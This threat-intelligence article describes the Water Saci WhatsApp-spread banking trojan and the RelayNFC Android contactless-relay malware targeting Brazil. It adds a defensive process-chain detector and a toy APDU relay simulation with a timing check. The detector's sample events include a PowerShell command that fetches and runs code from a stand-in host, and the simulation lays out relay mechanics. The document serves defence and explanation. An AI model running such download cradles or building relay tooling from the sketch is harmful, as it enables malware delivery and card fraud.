Brazil’s financial sector is contending with a sophisticated, multifaceted cyber offensive in which criminal actors are simultaneously refining old tactics and pioneering new ones to defraud consumers and institutions. This two-pronged assault marks a clear escalation in the complexity of cybercriminal operations, moving beyond simple malware to orchestrated campaigns that exploit users’ trust in messaging platforms and the convenience of modern payment technologies. One campaign comes from the threat actor Water Saci, which is distributing a potent banking trojan through a self-propagating WhatsApp worm. At the same time, a new Android malware named RelayNFC has emerged, engineered specifically to carry out real-time fraud against contactless payment systems and opening a dangerous new front in financial crime. Together, these threats show an adaptive and relentless adversary targeting one of Latin America’s largest economies.
The Evolving Playbook of a Sophisticated Trojan
The threat actor known as Water Saci is demonstrating a clear evolution in its operational playbook, deploying a multi-stage infection chain designed to slip past conventional security controls and maximize its reach among Brazilian banking customers. The attack opens with social engineering that trades on the trust people place in personal messaging. Victims receive deceptive WhatsApp messages, often appearing to come from known contacts, carrying a malicious attachment in either PDF or HTA format. The PDF lure prompts the user to update Adobe Reader and embeds a link that starts the infection. The HTA file is more direct: when opened it runs under mshta.exe, and its embedded VBScript invokes PowerShell to fetch the next-stage payloads from a remote server, which makes mshta.exe spawning powershell.exe a useful detection point for defenders. Both paths end in the download of an MSI installer package carrying the banking trojan together with a Python-based propagation script. This script, a notable upgrade from the group’s earlier reliance on PowerShell, spreads the malware in worm-like fashion through WhatsApp Web, with broader browser compatibility, better error handling and faster automation than its predecessor, making it a far more resilient and effective spreading tool.
Once the initial compromise succeeds, the MSI installer deploys the banking trojan through an AutoIt script that manages its execution and keeps it quiet. The script first checks for a marker file so that only one instance runs at a time, a mutex-style guard that avoids duplicate infections and the instability they would cause. On successful execution it reports the new infection to an attacker-controlled command-and-control server. The trojan’s design reveals its exclusive focus on the Brazilian market: one of its first actions is to check whether the Windows system language is Portuguese (Brazil), and it goes no further otherwise. It then carries out extensive reconnaissance on the compromised system, scanning for folders associated with major Brazilian financial institutions such as Bradesco, Itaú and Sicoob, as well as security software, and combs the user’s browser history for visits to a hard-coded list of banking websites. This data gathering lets the malware confirm it has landed on a valuable target before launching its primary payload: it starts a suspended copy of the legitimate Windows process svchost.exe and replaces that process’s memory with its own code, the technique known as process hollowing, so that the trojan runs under a trusted process name while it watches for opportunities to steal credentials.
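The chain described above, mshta.exe spawning PowerShell, PowerShell fetching and launching an MSI, the AutoIt loader, and finally a hollowed svchost.exe, leaves a distinctive parent/child trail in process-creation telemetry. The following Python is an added example of how a defender might score such telemetry; it is not code from the investigators or from the campaign. The events it runs on are constructed for illustration and carry none of the campaign's real file names, hashes or URLs, and the AutoIt interpreter name `autoit3.exe` and the download-cradle markers are assumptions.

```python
"""Heuristic detection of the infection chain described above, run over a
handful of constructed process-creation events. Added example, not code from
the investigators; the events are invented for illustration."""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-case
    cmdline: str


# Parent/child pairs the chain produces. HTA files are executed by mshta.exe,
# so an HTA lure that fetches payloads shows up as mshta.exe -> powershell.exe;
# the AutoIt interpreter name is an assumption (loaders often rename it).
SUSPECT_CHAINS = {
    ("mshta.exe", "powershell.exe"): "HTA lure launching PowerShell",
    ("powershell.exe", "msiexec.exe"): "PowerShell launching an MSI installer",
    ("msiexec.exe", "autoit3.exe"): "MSI package running an AutoIt script",
}
# Command-line fragments typical of a PowerShell download cradle.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")
# svchost.exe is started by services.exe on a healthy system; any other parent
# is a common masquerading / process-hollowing indicator (heuristic, not proof).
LEGIT_SVCHOST_PARENTS = {"services.exe"}


def detect(events):
    """Return (pid, description) findings for events matching the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_image = parent.image if parent else None
        if (parent_image, e.image) in SUSPECT_CHAINS:
            findings.append((e.pid, SUSPECT_CHAINS[(parent_image, e.image)]))
        if e.image == "powershell.exe" and any(
            m in e.cmdline.lower() for m in DOWNLOAD_MARKERS
        ):
            findings.append((e.pid, "PowerShell download cradle"))
        if e.image == "svchost.exe" and parent_image not in LEGIT_SVCHOST_PARENTS:
            findings.append((e.pid, f"svchost.exe with unexpected parent {parent_image}"))
    return findings


# Constructed events: a benign svchost.exe first, then the chain from the article.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, "services.exe", "services.exe"),
    ProcEvent(404, 400, "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(900, 4, "explorer.exe", "explorer.exe"),
    ProcEvent(910, 900, "mshta.exe", r'mshta.exe "C:\Users\u\Downloads\comprovante.hta"'),
    ProcEvent(920, 910, "powershell.exe",
              "powershell -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p')"),
    ProcEvent(930, 920, "msiexec.exe", r"msiexec /i C:\Users\u\AppData\Local\Temp\setup.msi /qn"),
    ProcEvent(940, 930, "autoit3.exe", "autoit3.exe loader.a3x"),
    ProcEvent(950, 940, "svchost.exe", "svchost.exe"),
]

if __name__ == "__main__":
    for pid, why in detect(SAMPLE_EVENTS):
        print(pid, why)
```

The benign svchost.exe (parent services.exe) produces no finding, while the hollowed copy launched from the AutoIt loader is flagged by parentage alone; in real telemetry the parent check is the cheapest hollowing indicator, and the command-line markers catch the PowerShell stage even when the lure file type changes.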
A New Frontier in Contactless Payment Fraud
Concurrent with Water Saci’s campaign, Brazil’s financial ecosystem faces a new threat from RelayNFC, a previously undocumented Android malware built to carry out Near-Field Communication relay attacks. The malware lets attackers capture contactless payment data and complete fraudulent transactions from a remote location. RelayNFC is distributed mainly through targeted phishing campaigns that steer potential victims to decoy websites with Portuguese-language content, posing as security platforms that protect payment cards. Users are persuaded to download and install the malicious application in the belief that it is a legitimate tool for safeguarding their financial information. Once installed, the malware is deceptively simple: it instructs the victim to tap their physical NFC-enabled credit or debit card against their own phone. Acting as an NFC reader, it captures the card’s data and then prompts the user to enter their four- or six-digit PIN. The complete set of credentials, card data and PIN together, is transmitted at once over a WebSocket connection to an attacker-controlled server, setting the stage for real-time fraud.
The “relay” component is what makes this malware particularly dangerous. An attacker equipped with a point-of-sale emulator device can be anywhere in the world when initiating a transaction. The command-and-control server acts as a bridge, relaying the transaction messages, known as Application Protocol Data Units (APDUs), between the attacker’s device and the victim’s infected phone in real time. RelayNFC receives each command and passes it to the phone’s NFC subsystem, which talks directly to the physical card the unsuspecting victim is still holding against the phone; the card’s responses travel back the same way. The result is a seamless remote link that lets the attacker complete a transaction as if the victim’s card were physically present at the attacker’s location. Because the terminal sees only ordinary APDU traffic, the extra hop is invisible to it except as added round-trip latency. The malware is built with React Native and shipped as Hermes bytecode, a combination that makes static analysis considerably harder and helps it evade most mobile security products. Investigators also found evidence of ongoing development, including a separate phishing site distributing an application with a partial implementation of Host Card Emulation, the Android facility that lets a phone present itself as a card to a terminal. If completed, this would allow an even more streamlined attack in which interactions between a legitimate POS terminal and an attacker’s device are passed through directly.
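To make the relay path concrete, the following Python simulation is an added example, not code from RelayNFC or from the investigators. It models a toy card, the infected phone in reader mode, the C2 bridge and a terminal, with constructed APDUs and data (the AID, the PAN and the latency figures are all assumed). It also goes slightly beyond the article by giving the terminal an optional round-trip bound, the principle behind the relay-resistance checks in EMV contactless kernels, to show why the extra hop is detectable by timing even though the APDU content is unchanged. PIN capture, which the article describes as a separate prompt, is not modelled.

```python
"""Simulation of the APDU relay described above. Added example: the card,
terminal, transport and all data are constructed stand-ins, not code or
captures from RelayNFC or from the investigators. The timing check in
Terminal illustrates the relay-resistance defence EMV contactless kernels
can apply; the article does not say whether the attackers ran into it."""

SW_OK = b"\x90\x00"

# Command APDUs a contactless kernel sends early in a transaction: SELECT by
# AID, GET PROCESSING OPTIONS, READ RECORD (SFI 1, record 1). Values constructed.
AID = bytes.fromhex("A0000000041010")
SELECT_AID = bytes([0x00, 0xA4, 0x04, 0x00, len(AID)]) + AID + b"\x00"
GPO = bytes.fromhex("80A8000002830000")
READ_RECORD = bytes.fromhex("00B2010C00")


class ToyCard:
    """Stand-in for the victim's physical card held against the infected phone."""
    PAN = "5412750000000000"          # constructed test PAN, not a real card

    def process(self, apdu: bytes) -> bytes:
        ins = apdu[1]
        lc = apdu[4] if len(apdu) > 4 else 0
        data = apdu[5:5 + lc]
        if ins == 0xA4:                                   # SELECT
            if data != AID:
                return b"\x6a\x82"                        # file not found
            return b"\x6f\x09\x84\x07" + AID + SW_OK      # FCI-like blob
        if ins == 0xA8:                                   # GET PROCESSING OPTIONS
            return bytes.fromhex("770A82021980940408010100") + SW_OK  # AIP/AFL-like blob
        if ins == 0xB2:                                   # READ RECORD
            return b"\x70\x0a\x5a\x08" + bytes.fromhex(self.PAN) + SW_OK  # tag 5A = PAN
        return b"\x6d\x00"                                # INS not supported


class DirectTap:
    """A genuine tap: the terminal talks to the card over its own NFC field.
    Round-trip time per APDU is an assumed 5 ms."""
    def __init__(self, card):
        self.card = card

    def exchange(self, apdu):
        return self.card.process(apdu), 5


class InfectedPhone:
    """RelayNFC's reader role: forwards every APDU it receives from C2 to the
    card resting against the phone and returns the card's answer."""
    def __init__(self, card):
        self.card = card

    def transceive(self, apdu):
        return self.card.process(apdu)


class C2Bridge:
    """The attacker's server: bridges the attacker-side device and the
    infected phone (a WebSocket in the real campaign; a direct call here).
    latency_ms is the assumed one-way internet delay. The server also sees
    every APDU and response, so card data is exposed to it in transit."""
    def __init__(self, phone, latency_ms):
        self.phone, self.latency_ms, self.log = phone, latency_ms, []

    def exchange(self, apdu):
        resp = self.phone.transceive(apdu)
        self.log.append((apdu.hex(), resp.hex()))
        return resp, 5 + 2 * self.latency_ms     # card time + there and back


class Terminal:
    """The terminal the attacker's device is presented to. It cannot tell a
    relayed card from a present one by content alone; only a round-trip
    bound (max_rtt_ms) on the exchange exposes the extra hop."""
    def __init__(self, channel, max_rtt_ms=None):
        self.channel, self.max_rtt_ms = channel, max_rtt_ms

    def run(self):
        pan = None
        for apdu in (SELECT_AID, GPO, READ_RECORD):
            resp, rtt = self.channel.exchange(apdu)
            if resp[-2:] != SW_OK:
                return {"ok": False, "reason": f"card error {resp[-2:].hex()}"}
            if self.max_rtt_ms is not None and rtt > self.max_rtt_ms:
                return {"ok": False, "reason": f"relay suspected: rtt {rtt} ms"}
            i = resp.find(b"\x5a\x08")               # pull the PAN out of the record
            if i >= 0:
                pan = resp[i + 2:i + 10].hex()
        return {"ok": True, "pan": pan}


def relayed_transaction(max_rtt_ms=None, latency_ms=150):
    """Attacker's device -> C2 -> infected phone -> victim's card, and back."""
    c2 = C2Bridge(InfectedPhone(ToyCard()), latency_ms)
    result = Terminal(c2, max_rtt_ms).run()
    result["seen_by_c2"] = len(c2.log)
    return result


def direct_transaction(max_rtt_ms=None):
    """The same card tapped directly on the terminal, for comparison."""
    return Terminal(DirectTap(ToyCard()), max_rtt_ms).run()


if __name__ == "__main__":
    print(relayed_transaction())               # succeeds: the relay is transparent
    print(relayed_transaction(max_rtt_ms=50))  # fails the timing bound
    print(direct_transaction(max_rtt_ms=50))   # a genuine tap passes it
```

Run as-is, the relayed transaction succeeds and the C2 log holds all three exchanges, including the record that carries the PAN; with `max_rtt_ms=50` the terminal rejects the relayed card at the first command while a direct tap passes. The assumed 150 ms one-way delay is generous, but any internet hop adds far more than the few milliseconds a card-to-terminal exchange takes, which is exactly the gap relay-resistance timing exploits.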
An Escalating Landscape of Financial Cybercrime
The simultaneous emergence of these two distinct campaigns marks a notable shift in the threat landscape targeting Brazil. The Water Saci operation shows how an established actor keeps refining its methods, leveraging a popular messaging platform and potentially AI-assisted development to deploy a reconnaissance-aware banking trojan with strong propagation capabilities, and reflects a sustained effort to improve the efficiency and stealth of traditional malware attacks. In parallel, RelayNFC signals the expansion of financial fraud into contactless payments, a domain previously considered more secure, and shows how quickly criminals build specialized tools to exploit new technologies and user behaviour. Both threats underscore the same trend: cybercriminals no longer rely on a single method but diversify their portfolios, combining social engineering, technical obfuscation and the exploitation of new payment ecosystems to bypass defenses and defraud users at scale. This pivot points to a more mature and dangerous adversary capable of running complex, parallel operations to maximize financial returns.

